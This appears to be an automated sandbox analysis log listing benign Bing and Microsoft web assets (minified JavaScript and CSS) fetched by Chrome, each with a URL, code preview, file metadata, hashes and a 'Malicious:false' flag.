                                                                            URL:https://r.bing.com/rp/927Cz2OI3S9hrbXauDAfIEUYRvo.js
                                                                            Preview:(function(){function d(n,t){for(var r=[],i=0;i<t.length;i++)r.push({MonitorID:t[i].name,RequestID:t[i].guid,Result:Math.round(n[i])});return JSON.stringify(r)}function u(){function n(){return Math.floor((1+Math.random())*65536).toString(16).substring(1)}return n()+n()+n()+n()+n()+n()+n()+n()}function h(){return window.performance&&window.performance.getEntriesByName?!0:!1}function c(n,t,i,r,u,f){function l(i){var w,b,p,k,y,g,nt;if(e!=null&&sb_ct(e),s[i]=c!=null?(new Date).getTime()-c:-1,i=(a+v)%n.length,o=new Image,a++<n.length)c=(new Date).getTime(),o.onload=function(){l(i)},w=function(){o.onload=null;o.onerror=null;c=null;l(i)},e=sb_st(function(){w()},t),o.onerror=function(){e!=null&&sb_ct(e);e=null;w()},o.src=n[i];else{if(r!=null&&r.length!==0){if(h())for(y=0;y<n.length;y++)b=n[y],p=window.performance.getEntriesByName(b),s[y]!=-1&&p&&p[0]&&(s[y]=p[0].duration);for(k=d(s,u),y=0;y<r.length;y++)g=r[y],nt=new Image,nt.src=g+k}f!=null&&f()}}var c,e,s=[],v=Math.floor(Math.random()*n.lengt
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (492), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):492
                                                                            Entropy (8bit):4.9172823168776345
                                                                            Encrypted:false
                                                                            SSDEEP:12:yNNGZUrVuzNN2T9mt2tuDiONNk83CNNPc9EEB:XZhSzvq
                                                                            MD5:6938A507C133F3E0C9BB9B13E99C0E89
                                                                            SHA1:B5999EEEFDC8E0CBBDFBC9DC9997586F32562059
                                                                            SHA-256:60039F6F768944DE42CCFA29CA687548FBBEFEB6F283D8C3B92E8338F141C1B2
                                                                            SHA-512:00DC05C1001F362EEB3DED8DF3C73596B933E4323E95E595CEC7572F1EA2346B2AAE0EF4911F629E7DD389C82E0531AB9FD9F9A36D0898C944A810D39331BCCC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/tZme7v3I4Mu9-8ncmZdYbzJWIFk.css
                                                                            Preview:.b_scopebar #b-scopeListItem-menu{padding:3px 0;line-height:30px;height:auto}.b_scopebar li:hover:not(.b_active)#b-scopeListItem-menu{border-bottom:none}.b_scopebar #b-scopeListItem-menu .b_sp_over_menu{margin:5px 0 0 14px}#b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item a{font-size:11px}.b_scopebar #b-scopeListItem-menu svg{width:16px;height:16px;display:block}.b_scopebar #b-scopeListItem-menu .b_sp_menu_separ{width:16px;height:15px;display:inline-block;vertical-align:text-bottom}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1219), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1219
                                                                            Entropy (8bit):5.052686280897065
                                                                            Encrypted:false
                                                                            SSDEEP:24:2K3LxZxoVHJraQURpQsnMioY9unM4Q/BmnOBYHBT6Meox85jqvM1X7Q:rtZfDRp+i7AMaT6MeoxwjqvMd7Q
                                                                            MD5:8A60B77B4399CE7756D322EF8E6B9FDB
                                                                            SHA1:11CD6912516E16F4BCD4DEF575A0C39B41E7C69B
                                                                            SHA-256:5B54ABE15108A53F051BBEC0889206BBE1B80F3DB2163B2B40189458AEF98250
                                                                            SHA-512:5105121299EC2D774A70AD53895B537ED6573F87DB0FDA9E03534A384834C3D661B518B0AAC603389CCA23C65D6F210429761526A58AECEE61D45A58A2F61457
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Ec1pElFuFvS81N71daDDm0Hnxps.js
                                                                            Preview:var SWRM;(function(n){function r(n,t){if(navigator&&navigator.serviceWorker&&navigator.serviceWorker.register&&!f()){var r="SWRM",i=n.toString();return navigator.serviceWorker.register("/BingDSWM.js?bsw="+i,{updateViaCache:"all",scope:t}).then(function(n){return e(),Log.Log(r,"RegistrationSucceeded",i,!1),sj_cook.set("SerpPWA","RegSWM",i,!0,"/"),n})["catch"](function(n){Log.Log(r,"RegistrationFailed",i+"; Error message: "+n);throw n;})}return Promise.reject("Navigator interface is not supported.")}function u(){if(navigator&&navigator.serviceWorker&&navigator.serviceWorker.getRegistrations&&!t){var n="SWRM";navigator.serviceWorker.getRegistrations().then(function(t){for(var u,i=0,r=t;i<r.length;i++)u=r[i],u.unregister().then(function(){sj_cook.clear("SerpPWA","/");Log.Log(n,"UnregisterSucceeded","")})["catch"](function(t){Log.Log(n,"UnregisterFailed","Error message: "+t)})})}}function f(){var r=i(),n;if(!r)return t;try{return n=sessionStorage.getItem("RegSWM"),n!=null}catch(u){return t}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                            Category:dropped
                                                                            Size (bytes):49911
                                                                            Entropy (8bit):7.994516776763163
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (438), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):438
                                                                            Entropy (8bit):4.931185416188087
                                                                            Encrypted:false
                                                                            SSDEEP:12:VQikiAM3ZQajLYfxZQxluxZQZGXqvXq4ZB:VrpHSogSx0xS8XqvXq2
                                                                            MD5:BD33D48372E231BB5D17D474EB72C3E9
                                                                            SHA1:B7A6D7235C9C16BBE2AFFF80479781999A1E0C54
                                                                            SHA-256:0902692225CF325455E896941A7DEF89A27E00EFE6F30BEA60F1ECF9D9651483
                                                                            SHA-512:9D1EA258B0F56B120C433B96BA56963D7512F081C9DD2CDA57CC6E8DA75A99F1D9A9B34FB7BBFBCB7D19D4E9580126F183D719736354E53EA4101F884FE86902
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/t6bXI1ycFrvir_-AR5eBmZoeDFQ.js
                                                                            Preview:_G!==undefined&&_G.EF!==undefined&&_G.EF.bmasynctrigger===1&&window.requestAnimationFrame!==undefined&&document.visibilityState!==undefined&&document.visibilityState==="visible"?requestAnimationFrame(function(){_G.EF.bmasynctrigger2===1?requestAnimationFrame(function(){BM.trigger()}):_G.EF.bmasynctrigger3===1?requestAnimationFrame(function(){setTimeout(function(){BM.trigger()},0)}):setTimeout(function(){BM.trigger()},0)}):BM.trigger()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (636), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):636
                                                                            Entropy (8bit):5.029944197384885
                                                                            Encrypted:false
                                                                            SSDEEP:12:7zqqVcGkJOuGfTVYOFZVLB+LVt2lPhVGBPmn2l23K:yqVcXONfTVYCVoLVt2BuBPmn2x
                                                                            MD5:D4CF0F50C1A6A5F120872B028ABFA16F
                                                                            SHA1:54C52312E2309468DAA4DC0058AF6B3A9AD28F25
                                                                            SHA-256:8738430B47725B079C13AF988F91E6516C9DAAD83AAF208C2A33509EF1AFAE63
                                                                            SHA-512:BD265F83C72CAF2E47FE85CA19AF2CE15D6759D838615C0F2E2D79B5327C7DCF5E8FE5194A371E481A91831860597D60BA0EFC3E923B142B8407320A2185E30C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VMUjEuIwlGjapNwAWK9rOprSjyU.css
                                                                            Preview:#b_skip_to_content{display:flex;flex-direction:row;justify-content:flex-end;align-items:center;padding:4px 4px 4px 19px;position:absolute;left:0;top:24px;background:#ececec;box-shadow:0 1.2px 3.6px rgba(0,0,0,.1),0 6.4px 14.4px rgba(0,0,0,.13);border-radius:0 28px 28px 0;z-index:1000}#b_skip_to_content:not(:focus){padding:0;clip:rect(1px,1px,1px,1px)}#b_skip_to_content .text-back{display:flex;flex-direction:row;align-items:flex-start;background:#fff;border-radius:16px;flex:none;order:0;flex-grow:0}#b_skip_to_content .text{font-weight:500;font-size:13px;line-height:16px;color:#001ba0;flex:none;order:0;flex-grow:0;margin:8px 17px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3452
                                                                            Entropy (8bit):5.117912766689607
                                                                            Encrypted:false
                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (309), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):309
                                                                            Entropy (8bit):5.0208858607599645
                                                                            Encrypted:false
                                                                            SSDEEP:6:wRRJ0FPLVeHLs1sCSXLnHsE+K8EaR3rLvOE+GEaRdk:yo5erCzisE+K8EcGE+GEEk
                                                                            MD5:FFD89AF92C57DEFB0BBC3F8CFF890B76
                                                                            SHA1:965D86E7279FBC2CBA565CD23009FA8B94EA7A4E
                                                                            SHA-256:165D4205029E48502B86A9BB5E409286A2EC8779A50120558A27C9D1E50F285F
                                                                            SHA-512:4DA1235000938EFB4FE9F50466E82653F9F08F0F3344D279F70DFB59E92C8282443C4D8362AF3F35314698AA4643F75BCDE601AC02CD413C2CD9D357F3FACF3A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/ll2G5yefvCy6VlzSMAn6i5Tqek4.css
                                                                            Preview:#id_a{background-color:#174ae4;color:#fff;border:none;border-radius:20px;box-shadow:none}#id_a:hover{box-shadow:0 3.2px 7.2px 0 rgba(0,0,0,.13),0 .6px 1.8px 0 rgba(0,0,0,.1);background-color:#0078d4}#id_a:active{box-shadow:0 1.6px 3.6px 0 rgba(0,0,0,.13),0 .3px .9px 0 rgba(0,0,0,.1);background-color:#106ebe}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (540), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):540
                                                                            Entropy (8bit):4.792851791232716
                                                                            Encrypted:false
                                                                            SSDEEP:12:Ogc0zM1ekqg6XHDhL9HUXyDmsLm4KNDXF/Xi4QkKNDXF/XTgsfAIeX4IUIO:OgDGrq/TV9HUXCh8LF/Xi4V8LF/XshI5
                                                                            MD5:6DBBC36CABC19D1DE8EC05C6ECCCFD96
                                                                            SHA1:631C927BBD5EE3EA6D31C40D1529720DC151BBA1
                                                                            SHA-256:03DD0B9127451450FCD3C706CA79F6663F121EEF7630DDC908571F08C1E79F8F
                                                                            SHA-512:5FC5F9C9F884589307F9C3F1DDC97CBCD5551A8DF2E7D5CCF2181DD69D57332901FA31182BDC3CBF0594FFD03848EE6D980EB51BCF49301BCC04027BF2EA81B9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var ErrFuncs;(function(n){function i(n,i,r){t("Error",n,i,r)}function r(n,i,r){t("Warning",n,i,r)}function t(n,t,i,r){var u,f;if(r?(u=r,u.message+=" "+t):u=new Error(t),u.extra="manualError",i&&(u.extra+=" "+i),u.severity=n,f=_w.jsErrorHandler,f)f(u);else throw u;}n.LogError=i;n.LogWarning=r})(ErrFuncs||(ErrFuncs={}));JS={LogError:ErrFuncs.LogError,LogWarning:ErrFuncs.LogWarning};SharedLogHelper={LogError:ErrFuncs.LogError,LogWarning:ErrFuncs.LogWarning,LogFatalError:function(){return null},RegisterErrorFilter:function(){return null}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):267
                                                                            Entropy (8bit):4.830921612091244
                                                                            Encrypted:false
                                                                            SSDEEP:6:f3XKG03NG03RjDKWTFUsKXKMSsgHezKKEw6TTT72NWh3T9:f3Xq313FnhnMUHLJLT+Ur
                                                                            MD5:8D8B62B173B93037BB3A53AEEFF12611
                                                                            SHA1:C16DD0EF80DEB06599CE69F249E10EA8B5806D3F
                                                                            SHA-256:C58B7B4387B2E8D16D09C314829BA0AA10AFC9BBC560625331140F897603020C
                                                                            SHA-512:05269F1ADA684E2BDBBD328ABAE353D9AA1A741638BF8021A96519C2E52B95F7FAC98CDB4B27AA7A7B6FF8F734423A344E556BEF49108069CE9BDF28D3BEB4C5
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/wW3Q74DesGWZzmnySeEOqLWAbT8.css
                                                                            Preview:#b_results h2 #kn_p,#b_results h3 #kn_p,#b_results h4 #kn_p{position:relative;display:inline}#b_pole #kn_p,.b_ans #kn_p{display:none}#kn_a{color:#4007a2;font:14px arial;left:-20px;position:absolute;top:25%}.b_title #kn_a,.b_overflow #kn_a{left:-3px;position:relative}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2532), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2532
                                                                            Entropy (8bit):5.113813403595448
                                                                            Encrypted:false
                                                                            SSDEEP:48:KbbpCuxQwqtceDdWTAtE9OtsaZQkvp8gODtTis2ka0qgH5W/ggl+/W9P:gFJZqWeDHtrGcQSKgODtTZa0qgH5WogP
                                                                            MD5:10102E62E2B6E663ED22E989AF46C43E
                                                                            SHA1:1EDC8B99BCFB0CDFFFEAD624663D6C127B04398D
                                                                            SHA-256:FBFDBB1FE8B890CA294B4D46B4E747949D618B12BF0F9476553FDDE6C7A425E2
                                                                            SHA-512:104F2E4767C6E72E75ED009C13EEBE71349C3A28D01E7D972A3C5FE9B272DA0D94D9D09BFFC82411960755BABB52A9ACE12BAA8A1823D47687A70AE75001D885
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/4N/jnc,nj/WjC77O8uVx9--UZpQC4Qfpa7qaE.js?bu=A683sje1Nw&or=w"
                                                                            Preview:var WireUp,WireConnector,SignalConnector;(function(n){function f(n){var u=[],f,t,i,r,e;if(!n)return u;for(f=n.split(","),t=0;t<f.length;++t)(i=f[t],i&&0!==i.length)&&(r=i.split("/"),e={ci:r[0],cp:r[1],ct:r[2]},u.push(e));return u}function e(n){var t=n.split(";");return{type:t[0],name:t[1],cons:f(t[2])}}function o(n){for(var t,r,u={eps:{},w:!1,id:""},f=n.split("|"),i=0;i<f.length;++i)t=f[i],t&&t.length>0&&(r=e(t),u.eps[r.name]=r);return u}function s(n,t){for(var u=null,o=_d.querySelectorAll,r,f,e,u=o?o.call(_d,"["+n+"]"):_d.getElementsByTagName("*"),i=0;i<u.length;i++)r=u[i],f=r.getAttribute,f&&(e=f.call(r,n),e&&t(r,e))}function h(n,i,r,u){if(t.cis[i]){u.nodeHandler&&u.nodeHandler(i,n,r,t.cis[i]);return}t.cis[i]={};u.logicHandler(i,t.cis[i]);u.nodeHandler&&u.nodeHandler(i,n,r,t.cis[i])}function c(){t={nc:0,nodes:{},chs:{},ihs:{},cis:{}};n.g=t}function i(){var r="data-wire",n,i;s(r,function(n,i){n.id||(n.id="wire"+t.nc++);var u=o(i);u.id=n.id;t.nodes[n.id]=u;n.removeAttribute(r)});for(n
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):76
                                                                            Entropy (8bit):4.613758804254278
                                                                            Encrypted:false
                                                                            SSDEEP:3:quwpTL0aDJd2AVFy1TqJmMM:quwZLkAftM
                                                                            MD5:E45559E064BE1CA6908E5725F042CAD0
                                                                            SHA1:427773F498E0C1C52641726DC7C8D7E6BA875F29
                                                                            SHA-256:8149EBBAB97636B492C4577E5D86B65001E672718BBD01218D8888B9989E7E4E
                                                                            SHA-512:F7B4C193C081C804B044F10AD705F2AA4F2C06671CDA0F898BB102F4DFFD77CEF09C18DEC5EFDC5F54F3CA9D11AB678E1A92A005581A340A8D8C43CCFB59D961
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Qndz9JjgwcUmQXJtx8jX5rqHXyk.js
                                                                            Preview:var LGUtility;(function(n){n.enableCleanSerp=!0})(LGUtility||(LGUtility={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (24731), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):24731
                                                                            Entropy (8bit):5.394076490010073
                                                                            Encrypted:false
                                                                            SSDEEP:384:VT9yphkEE2GFro1BmPgFn8vceEpOZZZMm+mdm1mGmMmDmXpOYZsYHC:VT90b+9o1BmoivceEuM96IZrgafZsyC
                                                                            MD5:57B7873C091880676A91A3B4AF9A6F6C
                                                                            SHA1:318F20A931E1E8B3011C8C0CA8B3659B91EC4139
                                                                            SHA-256:427E1D224DDE95EAE5737792F698261A4B329499BEF26EDBC9714D96B5E12BBB
                                                                            SHA-512:FF0DE4691EFB882A5EAF21168E723DBAA6D03EF6148CB4752EE10E9A4C93CEFC712675D709021594728E232BB0C1DA5BD58DE4C5E3DFBE8FDF16E8BBC216ACCA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/MY8gqTHh6LMBHIwMqLNlm5HsQTk.css
                                                                            Preview:#sw_as .sa_sg_searchicon{background-image:url('data:image/svg+xml,%3Csvg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" fill="none"%3E%3Cpath class="lefticon_gray70_fill" d="M7.57895 0.710526C11.3723 0.710526 14.4474 3.78563 14.4474 7.57895C14.4474 9.21969 13.872 10.726 12.9122 11.9073L17.555 16.5502C17.8325 16.8277 17.8325 17.2775 17.555 17.555C17.3028 17.8073 16.9081 17.8302 16.6299 17.6238L16.5502 17.555L11.9073 12.9122C10.726 13.872 9.21969 14.4474 7.57895 14.4474C3.78563 14.4474 0.710526 11.3723 0.710526 7.57895C0.710526 3.78563 3.78563 0.710526 7.57895 0.710526ZM7.57895 2.13158C4.57045 2.13158 2.13158 4.57045 2.13158 7.57895C2.13158 10.5874 4.57045 13.0263 7.57895 13.0263C10.5874 13.0263 13.0263 10.5874 13.0263 7.57895C13.0263 4.57045 10.5874 2.13158 7.57895 2.13158Z" fill="%23767676"%3E%3C/path%3E%3C/svg%3E');background-repeat:no-repeat}#sw_as .sa_sg_trendingicon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' wid
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (438), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):438
                                                                            Entropy (8bit):4.931185416188087
                                                                            Encrypted:false
                                                                            SSDEEP:12:VQikiAM3ZQajLYfxZQxluxZQZGXqvXq4ZB:VrpHSogSx0xS8XqvXq2
                                                                            MD5:BD33D48372E231BB5D17D474EB72C3E9
                                                                            SHA1:B7A6D7235C9C16BBE2AFFF80479781999A1E0C54
                                                                            SHA-256:0902692225CF325455E896941A7DEF89A27E00EFE6F30BEA60F1ECF9D9651483
                                                                            SHA-512:9D1EA258B0F56B120C433B96BA56963D7512F081C9DD2CDA57CC6E8DA75A99F1D9A9B34FB7BBFBCB7D19D4E9580126F183D719736354E53EA4101F884FE86902
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:_G!==undefined&&_G.EF!==undefined&&_G.EF.bmasynctrigger===1&&window.requestAnimationFrame!==undefined&&document.visibilityState!==undefined&&document.visibilityState==="visible"?requestAnimationFrame(function(){_G.EF.bmasynctrigger2===1?requestAnimationFrame(function(){BM.trigger()}):_G.EF.bmasynctrigger3===1?requestAnimationFrame(function(){setTimeout(function(){BM.trigger()},0)}):setTimeout(function(){BM.trigger()},0)}):BM.trigger()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):212
                                                                            Entropy (8bit):4.813377529566751
                                                                            Encrypted:false
                                                                            SSDEEP:6:qpC4DpTSp/jhiwW24kElpyhq2GpdIlYfA1RKqB:ipTC/jhVW24kElpyMhpdIlYfALK4
                                                                            MD5:F9C1A051CDD4FF16E2EE6DE304E9B2F6
                                                                            SHA1:A52C395C78C6D0C0E2F7A8448A340CB996622D95
                                                                            SHA-256:620840599904AEEFD4C9FA2AFD71F48DFECD8E29092B35221FBDA340488486A9
                                                                            SHA-512:0C45FDB66E6CF8DBE77B25265A985187E2BD5A190E08F23B82533D24857A8365C7EC954DF2BCA889990A585D5D4BF7F176C050DCC7682453778E8874E2441367
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/pSw5XHjG0MDi96hEijQMuZZiLZU.js
                                                                            Preview:var searchForm,content;_G.JCache&&(searchForm=_ge(keyMap.SearchForm),_G.SRF=searchForm&&searchForm.outerHTML,content=_ge(keyMap.Content),content||(content=_ge("sw_content")),_G.CNT=content?content.outerHTML:null)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (13576), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):13817
                                                                            Entropy (8bit):4.7312024415690725
                                                                            Encrypted:false
                                                                            SSDEEP:96:N7dgQfwGk1MJTAY7+YtwsFLUcCRV4Y14UcbOpKoln36QZUc0UcWg:N6QoGkexA4p1Wv1IOp7ln36QK
                                                                            MD5:46F146775DA3AC30B5DF112A8F60182F
                                                                            SHA1:391D822A5D14E9027DBC00DDE7518D0B79B94307
                                                                            SHA-256:4E4D76E82B7D74F3E5736F15044F72963E7F78EA7CB6FBC7E0051CD027AAAFF2
                                                                            SHA-512:5C0BDD21933B9661D7ECF6092198BB6CAB421408F667B1183AD84F32310C40CA1E3307C5D261C8C48E7BF547E4861121074C783422AB759BC63C73E2EB41C474
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/css/lib/bootstrap/bootstrap-select-namespaced.min.css
                                                                            Preview:/*!.. * Bootstrap-select v1.13.14 (https://developer.snapappointments.com/bootstrap-select).. *.. * Copyright 2012-2020 SnapAppointments, LLC.. * Licensed under MIT (https://github.com/snapappointments/bootstrap-select/blob/master/LICENSE).. */@-webkit-keyframes bs-notify-fadeOut{0%{opacity:.9}100%{opacity:0}}@-o-keyframes bs-notify-fadeOut{0%{opacity:.9}100%{opacity:0}}@keyframes bs-notify-fadeOut{0%{opacity:.9}100%{opacity:0}}.bootstrap-namespace .bootstrap-select>select.bs-select-hidden, .bootstrap-namespace select.bs-select-hidden, .bootstrap-namespace select.selectpicker{display:none!important}.bootstrap-namespace .bootstrap-select{width:220px\0;vertical-align:middle}.bootstrap-namespace .bootstrap-select>.dropdown-toggle{position:relative;width:100%;text-align:right;white-space:nowrap;display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-align:center;-webkit-align-items:center;-ms-flex-align:center;align-items:center;-we
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (905), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):905
                                                                            Entropy (8bit):5.273654524180373
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPleiOvpKP5n8kmyNSiRf1wVJ2:rVnoyixOQ5n8krNSiN1wr2
                                                                            MD5:78BA2BAC4274EBD7D060D6F02AE001D0
                                                                            SHA1:1A47860DC9AEDFE69DDC6E14A6C4BFC583C24D4E
                                                                            SHA-256:B908D312F517D62B6ECF48BD2FCDD83918E098485FE9BE42139AEC090775FAC6
                                                                            SHA-512:00DCD24F8D096EE625FEAF2E8376777D94535488871716DD6682EDE69C60231A3DDE168C76336A17A3BD6C4327EC138E33E1C9189DFE7427C5D4EE97B2374CE9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/GkeGDcmu3-ad3G4UpsS_xYPCTU4.js
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},LightLogger;(function(n){function i(n,t,i,r,u){var e,f;if(u=u||{},u.FID="ModernRewardsFlyout",u.EventName=i,_w&&_w.Log2&&Log2.LogEvent&&_G.XLS)Log2.LogEvent("ClientInst",u,t),Log2.ForceFlush&&r&&Log2.ForceFlush(!0);else if(_w&&_w.Log&&Log.Log){if(e=["Fallback","1"],u&&u.hasOwnProperty)for(f in u)u.hasOwnProperty(f)&&(e.push(f?f.toString():""),e.push(u[f]?u[f].toString():""));Log.Log.apply(Log,__spreadArray([t,"ModernRewardsFlyout",i,r],e,!1))}}var t;(function(n){n.Click="Click";n.Init="Init";n.Load="Load";n.Success="Success";n.Error="Error"})(t=n.InstrumentationEventType||(n.InstrumentationEventType={}));n.logInstrumentationV2=i})(LightLogger||(LightLogger={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):34
                                                                            Entropy (8bit):3.513645929358371
                                                                            Encrypted:false
                                                                            SSDEEP:3:GGM1Jn/zf:s/zf
                                                                            MD5:4ECF37D508B1CE0E6072259785BFC7AE
                                                                            SHA1:4F46A5CADC934678560EE3A05FF44F9621142F48
                                                                            SHA-256:F5697730D885048233C9D70C013BD53F5AFF995843B34BBD1370B8D3EE7B596F
                                                                            SHA-512:9CF44CA831BEA344F51820D1825054E8C6C1DB3EB1A2A16A9013DAF1D46CE38C0C07BAF6122E91A45F072A3CA8235A972568D0716FCCB9BF2E56211372BD5B9E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/T0alytyTRnhWDuOgX_RPliEUL0g.css
                                                                            Preview:.b_CursorProgress{cursor:progress}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
